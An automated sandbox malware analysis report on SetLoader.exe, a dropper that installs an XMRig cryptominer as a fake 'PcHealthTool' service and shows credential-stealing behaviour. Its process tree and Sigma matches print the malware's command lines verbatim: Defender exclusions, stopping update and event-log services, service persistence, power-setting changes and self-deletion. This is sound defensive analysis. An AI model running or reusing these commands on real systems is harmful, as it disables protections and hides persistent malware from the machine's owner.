Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SetLoader.exe

Overview

General Information

Sample name:SetLoader.exe
Analysis ID:1498675
MD5:68adcb0c0e4419351ae5371732ea78dd
SHA1:66817456a9339399d01b37ebb59bca59cbc7ec7d
SHA256:695cb5d1f8e58dc1c894791b70adc5bd1b0401e6e0fcf55a82637796ec236d84
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SetLoader.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\SetLoader.exe" MD5: 68ADCB0C0E4419351AE5371732EA78DD)
    • w1.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe" MD5: 739213A2496D01E16DDC02B6898A81AD)
    • w2.exe (PID: 6104 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" MD5: FCE277E4928FDE19CD8BAD5CE1997792)
      • powershell.exe (PID: 2860 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6480 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 6072 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 6900 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1508 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1904 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1544 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1716 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3408 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4112 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4164 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 1104 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4020 cmdline: C:\Windows\system32\sc.exe delete "PcHealthTool" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4420 cmdline: C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5004 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3872 cmdline: C:\Windows\system32\sc.exe start "PcHealthTool" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3020 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 2784 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
    • w3.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe" MD5: 286405D179DCBBC1ACB0B5957B45CDF7)
  • HealthTool.exe (PID: 5628 cmdline: C:\ProgramData\PcHealthTool\HealthTool.exe MD5: FCE277E4928FDE19CD8BAD5CE1997792)
    • powershell.exe (PID: 4192 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6712 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6928 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 6640 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6936 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7084 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3736 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 884 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6152 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1816 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6064 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4632 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dwm.exe (PID: 6072 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000044.00000002.2958991562.000001F3D6BC4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000044.00000003.2855013595.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000044.00000002.2958991562.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x10c08:$a1: mining.set_target
          • 0x2e30:$a2: XMRIG_HOSTNAME
          • 0x57a8:$a3: Usage: xmrig [OPTIONS]
          • 0x2e08:$a4: XMRIG_VERSION
          Click to see the 8 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          42.3.HealthTool.exe.900000.2.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            42.3.HealthTool.exe.900000.2.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x36fe08:$a1: mining.set_target
            • 0x362030:$a2: XMRIG_HOSTNAME
            • 0x3649a8:$a3: Usage: xmrig [OPTIONS]
            • 0x362008:$a4: XMRIG_VERSION
            42.3.HealthTool.exe.900000.2.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
            • 0x3b5561:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
            42.3.HealthTool.exe.900000.2.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
            • 0x3b5dd8:$s1: %s/%s (Windows NT %lu.%lu
            • 0x3b9400:$s3: \\.\WinRing0_
            • 0x366fa8:$s4: pool_wallet
            • 0x3613d8:$s5: cryptonight
            • 0x3613e8:$s5: cryptonight
            • 0x3613f8:$s5: cryptonight
            • 0x361408:$s5: cryptonight
            • 0x361420:$s5: cryptonight
            • 0x361430:$s5: cryptonight
            • 0x361440:$s5: cryptonight
            • 0x361458:$s5: cryptonight
            • 0x361468:$s5: cryptonight
            • 0x361480:$s5: cryptonight
            • 0x361498:$s5: cryptonight
            • 0x3614a8:$s5: cryptonight
            • 0x3614b8:$s5: cryptonight
            • 0x3614c8:$s5: cryptonight
            • 0x3614e0:$s5: cryptonight
            • 0x3614f8:$s5: cryptonight
            • 0x361508:$s5: cryptonight
            • 0x361518:$s5: cryptonight
            42.3.HealthTool.exe.900000.2.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 7 entries

              Sigma Signatures

              Change of critical system settings

              barindex
              Sigma detected: Disable power options
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3408, ProcessName: powercfg.exe

              System Summary

              barindex
              Sigma detected: Files With System Process Name In Unsuspected Locations
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe, ProcessId: 5328, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2860, ProcessName: powershell.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2860, ProcessName: powershell.exe
              Sigma detected: New Service Creation Using Sc.EXE
              Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto", ProcessId: 4420, ProcessName: sc.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2860, ProcessName: powershell.exe

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Stop EventLog
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5004, ProcessName: sc.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exeAvira: detection malicious, Label: TR/Crypt.OPACK.Gen
              Multi AV Scanner detection for submitted file
              Source: SetLoader.exeVirustotal: Detection: 18%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

              Bitcoin Miner

              barindex
              Yara detected Xmrig cryptocurrency miner
              Source: Yara matchFile source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000044.00000002.2958991562.000001F3D6BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000003.2855013595.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.2958991562.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.2958991562.000001F3D6B89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000044.00000002.2958991562.000001F3D6C5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HealthTool.exe PID: 5628, type: MEMORYSTR
              DNS related to crypt mining pools
              Source: unknownDNS query: name: xmr-eu1.nanopool.org
              Found strings related to Crypto-Mining
              Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
              Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
              Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
              Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
              Source: SetLoader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: SetLoader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SetLoader.exe, SetLoader.exe, 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp, SetLoader.exe, 00000000.00000000.1696717128.0000000000646000.00000002.00000001.01000000.00000003.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: w1.exe, 00000004.00000002.2313531816.0000000003B6A000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: w1.exe, 00000004.00000002.2314431379.00000000048FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbern.default source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: w1.exe, 00000004.00000002.2314431379.00000000048FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: w1.exe, 00000004.00000002.2313531816.0000000003B6A000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831r source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatiner source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\SetLoader.exeCode function: 0_2_0061C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0061C4A8
